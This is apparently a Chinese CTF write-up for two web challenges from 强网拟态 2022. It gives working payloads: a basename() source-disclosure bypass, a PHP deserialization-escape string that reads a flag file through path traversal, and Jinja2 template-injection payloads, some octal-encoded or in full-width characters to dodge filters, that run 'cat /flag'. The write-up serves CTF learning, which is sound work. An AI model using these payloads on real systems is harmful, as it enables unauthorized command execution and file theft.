强网拟态 2022 web复现

ezus

include 'tm.php'; // Next step in tm.php
if (preg_match('/tm\.php\/*$/i', $_SERVER['PHP_SELF']))
{
    exit("no way!");
}
if (isset($_GET['source']))
{
    $path = basename($_SERVER['PHP_SELF']);
    if (!preg_match('/tm.php$/', $path) && !preg_match('/index.php$/', $path))
    {
        exit("nonono!");
    }
    highlight_file($path);
    exit();
}
?>
<a href="index.php?source">source</a>

利用不可见字符绕过

/index.php/tm.php/%dfsource

造成这里的绕过主要是因为basename()在Linux下，如果取得的文件名开头是非ASCII码范围的字符，则basename()会抛弃这个文件名，继续往上一层走，把上一层的文件名取出来，直到获取到正常可显示ASCII字符开头的文件名(Windows下直接获取)。

这个知识点和下面的在之前有过类似的题目:（https://blog.csdn.net/mochu7777777/article/details/127216646）

获得源码：

class UserAccount
{
    protected $username;
    protected $password;
 
    public function __construct($username, $password)
    {
        $this->username = $username;
        $this->password = $password;
    }
}
 
function object_sleep($str)
{
    $ob = str_replace(chr(0).'*'.chr(0), '@0@0@0@', $str);
    return $ob;
}
 
function object_weakup($ob)
{
    $r = str_replace('@0@0@0@', chr(0).'*'.chr(0), $ob);
    return $r;
}

class order
{
    public $f;
    public $hint;
    
    public function __construct($hint, $f)
    {
        $this->f = $f;
        $this->hint = $hint;
    }
    
    public function __wakeup()
    {
        //something in hint.php
        if ($this->hint != "pass" || $this->f != "pass") {
            $this->hint = "pass";
            $this->f = "pass";
        }
    }
    
    public function __destruct()
    {
        if (filter_var($this->hint, FILTER_VALIDATE_URL))
        {
            $r = parse_url($this->hint);
            if (!empty($this->f)) {
                if (strpos($this->f, "try") !==  false && strpos($this->f, "pass") !== false) {
                    @include($this->f . '.php');
                } else {
                    die("try again!");
                }
                if (preg_match('/prankhub$/', $r['host'])) {
                    echo $this->hint;
                    @$out = file_get_contents($this->hint);
                    echo "
".$out;
                } else {
                    die("
error");
                }
            } else {
                die("try it!");
            }
        }
        else
        {
            echo "Invalid URL";
        }
    }
}


$username = $_POST['username'];
$password = $_POST['password'];
$user = serialize(new UserAccount($username, $password));
unserialize(object_weakup(object_sleep($user)));
?>

反序列化逃逸
payload：

username=@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@&password=";s:11:"%00*%00password";O:5:"order":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:55:"succ://prankhub/../../../../../../../f1111444449999.txt";}

没有人比我更懂py

利用半角转全角，来绕过。

{{ｌｉｐｓｕｍ.__ｇｌｏｂａｌｓ__['ｏｓ'].ｐｏｐｅｎ('ｃａｔ /ｆｌａｇ').ｒｅａｄ()}}

还可以，用 八进制绕过

str = 'class'
poc = ''
for i in str:
    poc += "\\"+"\\"+oct(ord(i))
    poc = poc.replace('0o','')
print(poc)

{{()["__\\143\\154\\141\\163\\163__"]["__\\155\\162\\157__"][1]["__\\163\\165\\142\\143\\154\\141\\163\\163\\145\\163__"]()[247]["__\\151\\156\\151\\164__"]["__\\147\\154\\157\\142\\141\\154\\163__"]["\\157\\163"]["\\160\\157\\160\\145\\156"]("\\143\\141\\164\\40\\57\\146\\154\\141\\147")["\\162\\145\\141\\144"]()}}

reference

https://www.bilibili.com/read/cv19571698
https://www.ctfiot.com/70190.html